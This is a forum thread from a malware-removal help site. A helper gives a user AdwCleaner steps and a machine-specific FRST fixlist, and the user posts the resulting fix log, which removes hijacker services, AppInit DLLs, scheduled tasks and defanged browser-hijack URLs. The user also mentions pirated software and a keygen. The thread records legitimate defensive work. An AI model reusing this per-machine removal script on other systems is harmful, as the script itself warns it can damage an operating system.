We need to run a fix with FRST:
  • Please download the attached fixlist.txt file and save it to the same location as FRST
    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
    attachicon.giffixlist.txt
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
====================================

:step3:
  • Please download AdwCleaner by Malwarebytes and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8/10 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • To open a Cleaning log, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.
====================================

In your next reply post CKFiles.txt, fixlog.txt,AdwCleaner logs and new FRST & Addition.txt log
ATTENTION! Please select Addition.txt AND Drivers MD5 checkbox in FRST before scanning

Member of the Bleeping Computer A.I.I. early response team!


#8 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 12 March 2017 - 02:22 PM

I can't download fixlist.txt, apparently I don't have the permission - http://prntscr.com/ej44gg

 

Also, I have so much pirated software, it would be difficult to find it all and remove. You mentioned some of your tools do that?


Edited by stipess, 12 March 2017 - 02:26 PM.


#9 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 12 March 2017 - 05:32 PM

Hi

 

Were you logged in when you tried to download the attachment?

 


Also, I have so much pirated software, it would be difficult to find it all and remove. You mentioned some of your tools do that?

 

I can try to help with that but first we gotta clean your computer.


Edited by Slurppa, 12 March 2017 - 05:38 PM.

Member of the Bleeping Computer A.I.I. early response team!


#10 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 12 March 2017 - 09:32 PM

Yeah, I am logged in, but it's not allowing me to download it.



#11 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 13 March 2017 - 12:11 PM

Ok, so I tried logging out, logging in, but nothing worked, always this page pops up when I click on it - http://prntscr.com/ejhdlw

 

Can you upload the file on another website?



#12 Slurppa

Slurppa

  • Malware Study Hall Senior
  • 656 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:16 PM

Posted 13 March 2017 - 02:57 PM

Hi stipess

 

Here is the fixlist. Do same as before but save it with unicode encoding:
Open notepad & paste the text
Click File from the top and Save as...
From the bottom right select Encoding: Unicode
and click Save.

 

CloseProcesses:
EmptyTemp:
Hosts:
ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}
C:\ProgramData\ApphserftoH
C:\Program Files (x86)\Werbering Configuration
C:\Program Files (x86)\amulell
C:\Users\stipe\AppData\Roaming\Kyubey
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\...\Run: [YWPack] => regsvr32.exe C:\Users\stipe\AppData\Local\YWPack\dglxyttq.dll <===== ATTENTION
HKLM\...\Providers\9i0hqj4q: C:\Program Files (x86)\Werbering Configuration\local64spl.dll
AppInit_DLLs: C:\ProgramData\ApphserftoH\Ronis.dll => C:\ProgramData\ApphserftoH\Ronis.dll [358912 2017-03-10] ()
AppInit_DLLs-x32: C:\ProgramData\ApphserftoH\White-Flex.dll => C:\ProgramData\ApphserftoH\White-Flex.dll [248320 2017-03-10] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
Edge HomeButtonPage: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
R2 ApphserftoH; C:\ProgramData\\ApphserftoH\\ApphserftoH.exe [1125376 2017-03-10] () [File not signed]
R2 WinSAPSvc; C:\Users\stipe\AppData\Roaming\WinSAPSvc\WinSAP.dll [184832 2017-03-10] (Windows) [File not signed]
R2 WinSnare; C:\Users\stipe\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 ed2kidle; "C:\Program Files (x86)\amulell\ed2k.exe" -downloadwhenidle [X]
S2 Kyubey; C:\Users\stipe\AppData\Roaming\Kyubey\Kyubey.exe -s [X]
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Users\stipe\AppData\Local\Ghetutainantigh
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Program Files (x86)\Anobert
2017-03-10 18:33 - 2017-03-10 18:46 - 00000000 ____D C:\Users\stipe\AppData\Local\FindIp
2017-03-10 16:31 - 2017-03-10 16:32 - 00003680 _____ C:\Windows\System32\Tasks\Milimili
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSnare
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSAPSvc
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-10 16:27 - 2017-03-10 16:32 - 00000000 ____D C:\Program Files (x86)\MK
2017-03-10 16:26 - 2017-03-10 16:26 - 00000000 ____D C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA}
2017-03-02 02:08 - 2017-03-02 02:09 - 03588743 _____ C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip
2017-02-22 00:30 - 2017-02-22 00:30 - 00003212 _____ C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD}
2017-02-17 08:26 - 2017-02-17 08:26 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Easeware
2017-02-09 18:08 - 2017-02-09 18:08 - 00000000 ____D C:\Windows\system32\˙˙˙˙˙˙˙˙
Task: {B4598892-12B4-4458-9072-A672F8AB6DDB} - \{26474B21-8F86-490C-859C-F4966862DDFB} -> No File <==== ATTENTION
Task: {B544AD48-18DE-4441-B1F9-CF3C3BE5014F} - \Online Application Guardian -> No File <==== ATTENTION
Task: {BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2016-12-28] ()
Task: {BB82AE49-47B7-437A-B4B4-C356EA136A07} - \Online Application Updater -> No File <==== ATTENTION
Task: {D9F5FF7B-743F-443B-989E-4CE27064FAD0} - \Online Application v209 -> No File <==== ATTENTION
Task: {EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} - \Online Application v209 Guard -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833


Member of the Bleeping Computer A.I.I. early response team!


#13 stipess

stipess
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:04:16 PM

Posted 13 March 2017 - 05:09 PM

From CKscanner - 

CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\users\stipe\documents\my games\galciv3\hotkeys.ini
c:\users\stipe\downloads\sony vegas pro 13.0 build 453 (x64) + patch di\keygen & patch by di\keygen.zip
scanner sequence 3.LB.11.TMAAAA
 ----- EOF ----- 

Fixlog - 

Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
Ran by stipe (13-03-2017 22:50:46) Run:3
Running from C:\Users\stipe\Desktop\New folder (4)
Loaded Profiles: stipe (Available Profiles: defaultuser0 & stipe)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
EmptyTemp:
Hosts:
ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}
C:\ProgramData\ApphserftoH
C:\Program Files (x86)\Werbering Configuration
C:\Program Files (x86)\amulell
C:\Users\stipe\AppData\Roaming\Kyubey
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\...\Run: [YWPack] => regsvr32.exe C:\Users\stipe\AppData\Local\YWPack\dglxyttq.dll <===== ATTENTION
HKLM\...\Providers\9i0hqj4q: C:\Program Files (x86)\Werbering Configuration\local64spl.dll
AppInit_DLLs: C:\ProgramData\ApphserftoH\Ronis.dll => C:\ProgramData\ApphserftoH\Ronis.dll [358912 2017-03-10] ()
AppInit_DLLs-x32: C:\ProgramData\ApphserftoH\White-Flex.dll => C:\ProgramData\ApphserftoH\White-Flex.dll [248320 2017-03-10] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
Edge HomeButtonPage: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
R2 ApphserftoH; C:\ProgramData\\ApphserftoH\\ApphserftoH.exe [1125376 2017-03-10] () [File not signed]
R2 WinSAPSvc; C:\Users\stipe\AppData\Roaming\WinSAPSvc\WinSAP.dll [184832 2017-03-10] (Windows) [File not signed]
R2 WinSnare; C:\Users\stipe\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 ed2kidle; "C:\Program Files (x86)\amulell\ed2k.exe" -downloadwhenidle [X]
S2 Kyubey; C:\Users\stipe\AppData\Roaming\Kyubey\Kyubey.exe -s [X]
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Users\stipe\AppData\Local\Ghetutainantigh
2017-03-10 18:34 - 2017-03-10 18:34 - 00000000 ____D C:\Program Files (x86)\Anobert
2017-03-10 18:33 - 2017-03-10 18:46 - 00000000 ____D C:\Users\stipe\AppData\Local\FindIp
2017-03-10 16:31 - 2017-03-10 16:32 - 00003680 _____ C:\Windows\System32\Tasks\Milimili
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSnare
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Users\stipe\AppData\Roaming\WinSAPSvc
2017-03-10 16:31 - 2017-03-10 16:31 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-10 16:27 - 2017-03-10 16:32 - 00000000 ____D C:\Program Files (x86)\MK
2017-03-10 16:26 - 2017-03-10 16:26 - 00000000 ____D C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA}
2017-03-02 02:08 - 2017-03-02 02:09 - 03588743 _____ C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip
2017-02-22 00:30 - 2017-02-22 00:30 - 00003212 _____ C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD}
2017-02-17 08:26 - 2017-02-17 08:26 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Easeware
2017-02-09 18:08 - 2017-02-09 18:08 - 00000000 ____D C:\Windows\system32\˙˙˙˙˙˙˙˙
Task: {B4598892-12B4-4458-9072-A672F8AB6DDB} - \{26474B21-8F86-490C-859C-F4966862DDFB} -> No File <==== ATTENTION
Task: {B544AD48-18DE-4441-B1F9-CF3C3BE5014F} - \Online Application Guardian -> No File <==== ATTENTION
Task: {BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2016-12-28] ()
Task: {BB82AE49-47B7-437A-B4B4-C356EA136A07} - \Online Application Updater -> No File <==== ATTENTION
Task: {D9F5FF7B-743F-443B-989E-4CE27064FAD0} - \Online Application v209 -> No File <==== ATTENTION
Task: {EEDFB7AD-8B64-415B-B80E-1CDF8073A90E} - \Online Application v209 Guard -> No File <==== ATTENTION
ShortcutWithArgument: C:\Users\stipe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.startpageing123.com/?type=sc&ts=1489159954&z=4c98e1d8f273e3a1685e965gdzbbdtcgdw4tct9w5q&from=che0812&uid=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833
*****************

Processes closed successfully.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
================== ExportKey: ===================

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{773A4DAA-2970-4728-BF16-43941A803408}" => not found

=== End of ExportKey ===
C:\ProgramData\ApphserftoH => moved successfully
"C:\Program Files (x86)\Werbering Configuration" => not found.
C:\Program Files (x86)\amulell => moved successfully
C:\Users\stipe\AppData\Roaming\Kyubey => moved successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YWPack => value removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\9i0hqj4q => key removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 9i0hqj4q => removed successfully
"C:\ProgramData\ApphserftoH\Ronis.dll" => Value data not found.
"C:\ProgramData\ApphserftoH\White-Flex.dll" => Value data not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Error setting value.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Error setting value.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Error setting value.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key could not remove, key could be protected
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found. 
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => value restored successfully
HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\\HomeButtonPage => value removed successfully
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => value restored successfully
HKLM\System\CurrentControlSet\Services\ApphserftoH => key removed successfully
ApphserftoH => service removed successfully
HKLM\System\CurrentControlSet\Services\WinSAPSvc => key removed successfully
WinSAPSvc => service removed successfully
WinSnare => Unable to stop service.
HKLM\System\CurrentControlSet\Services\WinSnare => key removed successfully
WinSnare => service removed successfully
HKLM\System\CurrentControlSet\Services\ed2kidle => key removed successfully
ed2kidle => service removed successfully
HKLM\System\CurrentControlSet\Services\Kyubey => key removed successfully
Kyubey => service removed successfully
C:\Users\stipe\AppData\Local\Ghetutainantigh => moved successfully
C:\Program Files (x86)\Anobert => moved successfully
C:\Users\stipe\AppData\Local\FindIp => moved successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
C:\Users\stipe\AppData\Roaming\WinSnare => moved successfully
C:\Users\stipe\AppData\Roaming\WinSAPSvc => moved successfully
C:\Program Files (x86)\MIO => moved successfully
C:\Program Files (x86)\MK => moved successfully
C:\Program Files (x86)\{B4CE4BCE-D0F4-4561-AB38-F33763AB7BEA} => moved successfully
C:\Users\stipe\Downloads\drive-download-20170302T010841Z-001.zip => moved successfully
C:\Windows\System32\Tasks\{BEA1DF75-CB48-4C32-B944-A3BB20E26AAD} => moved successfully
C:\Users\stipe\AppData\Roaming\Easeware => moved successfully
C:\Windows\system32\˙˙˙˙˙˙˙˙ => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B4598892-12B4-4458-9072-A672F8AB6DDB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4598892-12B4-4458-9072-A672F8AB6DDB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{26474B21-8F86-490C-859C-F4966862DDFB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B544AD48-18DE-4441-B1F9-CF3C3BE5014F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B544AD48-18DE-4441-B1F9-CF3C3BE5014F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA8CD433-71DD-4492-9D78-BFCC7ADBC82D} => key removed successfully
C:\Windows\System32\Tasks\Milimili => not found.
